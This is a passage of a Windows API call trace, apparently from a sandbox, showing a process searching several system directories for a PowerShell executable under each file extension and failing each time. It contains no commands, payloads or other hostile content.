	[0428.599] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.599] SetErrorMode (uMode=0x1) returned 0x1
	[0428.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.600] SetErrorMode (uMode=0x1) returned 0x1
	[0428.600] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.600] SetErrorMode (uMode=0x1) returned 0x1
	[0428.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.600] SetErrorMode (uMode=0x1) returned 0x1
	[0428.600] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.601] SetErrorMode (uMode=0x1) returned 0x1
	[0428.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.601] SetErrorMode (uMode=0x1) returned 0x1
	[0428.601] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.601] SetErrorMode (uMode=0x1) returned 0x1
	[0428.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.602] SetErrorMode (uMode=0x1) returned 0x1
	[0428.602] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.602] SetErrorMode (uMode=0x1) returned 0x1
	[0428.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.602] SetErrorMode (uMode=0x1) returned 0x1
	[0428.602] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.603] SetErrorMode (uMode=0x1) returned 0x1
	[0428.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.603] SetErrorMode (uMode=0x1) returned 0x1
	[0428.603] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.603] SetErrorMode (uMode=0x1) returned 0x1
	[0428.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.603] SetErrorMode (uMode=0x1) returned 0x1
	[0428.604] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.604] SetErrorMode (uMode=0x1) returned 0x1
	[0428.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.604] SetErrorMode (uMode=0x1) returned 0x1
	[0428.604] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.604] SetErrorMode (uMode=0x1) returned 0x1
	[0428.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.605] SetErrorMode (uMode=0x1) returned 0x1
	[0428.605] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.605] SetErrorMode (uMode=0x1) returned 0x1
	[0428.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.605] SetErrorMode (uMode=0x1) returned 0x1
	[0428.605] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.606] SetErrorMode (uMode=0x1) returned 0x1
	[0428.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.606] SetErrorMode (uMode=0x1) returned 0x1
	[0428.606] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.606] SetErrorMode (uMode=0x1) returned 0x1
	[0428.606] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.606] SetErrorMode (uMode=0x1) returned 0x1
	[0428.607] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.607] SetErrorMode (uMode=0x1) returned 0x1
	[0428.607] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.607] SetErrorMode (uMode=0x1) returned 0x1
	[0428.607] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.607] SetErrorMode (uMode=0x1) returned 0x1
	[0428.608] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.608] SetErrorMode (uMode=0x1) returned 0x1
	[0428.608] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.608] SetErrorMode (uMode=0x1) returned 0x1
	[0428.608] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.608] SetErrorMode (uMode=0x1) returned 0x1
	[0428.608] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.609] SetErrorMode (uMode=0x1) returned 0x1
	[0428.609] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.609] SetErrorMode (uMode=0x1) returned 0x1
	[0428.609] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.609] SetErrorMode (uMode=0x1) returned 0x1
	[0428.609] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.609] SetErrorMode (uMode=0x1) returned 0x1
	[0428.610] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.610] SetErrorMode (uMode=0x1) returned 0x1
	[0428.610] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.610] SetErrorMode (uMode=0x1) returned 0x1
	[0428.610] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.610] SetErrorMode (uMode=0x1) returned 0x1
	[0428.610] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.611] SetErrorMode (uMode=0x1) returned 0x1
	[0428.611] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.611] SetErrorMode (uMode=0x1) returned 0x1
	[0428.611] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.611] SetErrorMode (uMode=0x1) returned 0x1
	[0428.611] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.611] SetErrorMode (uMode=0x1) returned 0x1
	[0428.612] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.612] SetErrorMode (uMode=0x1) returned 0x1
	[0428.612] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.612] SetErrorMode (uMode=0x1) returned 0x1
	[0428.612] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.612] SetErrorMode (uMode=0x1) returned 0x1
	[0428.613] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.613] SetErrorMode (uMode=0x1) returned 0x1
	[0428.613] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.613] SetErrorMode (uMode=0x1) returned 0x1
	[0428.613] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.613] SetErrorMode (uMode=0x1) returned 0x1
	[0428.614] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.614] SetErrorMode (uMode=0x1) returned 0x1
	[0428.614] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.614] SetErrorMode (uMode=0x1) returned 0x1
	[0428.614] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.614] SetErrorMode (uMode=0x1) returned 0x1
	[0428.614] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.615] SetErrorMode (uMode=0x1) returned 0x1
	[0428.615] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.615] SetErrorMode (uMode=0x1) returned 0x1
	[0428.615] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.615] SetErrorMode (uMode=0x1) returned 0x1
	[0428.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.616] SetErrorMode (uMode=0x1) returned 0x1
	[0428.616] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.616] SetErrorMode (uMode=0x1) returned 0x1
	[0428.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.616] SetErrorMode (uMode=0x1) returned 0x1
	[0428.616] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.616] SetErrorMode (uMode=0x1) returned 0x1
	[0428.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.617] SetErrorMode (uMode=0x1) returned 0x1
	[0428.617] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.617] SetErrorMode (uMode=0x1) returned 0x1
	[0428.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.617] SetErrorMode (uMode=0x1) returned 0x1
	[0428.617] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.618] SetErrorMode (uMode=0x1) returned 0x1
	[0428.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.618] SetErrorMode (uMode=0x1) returned 0x1
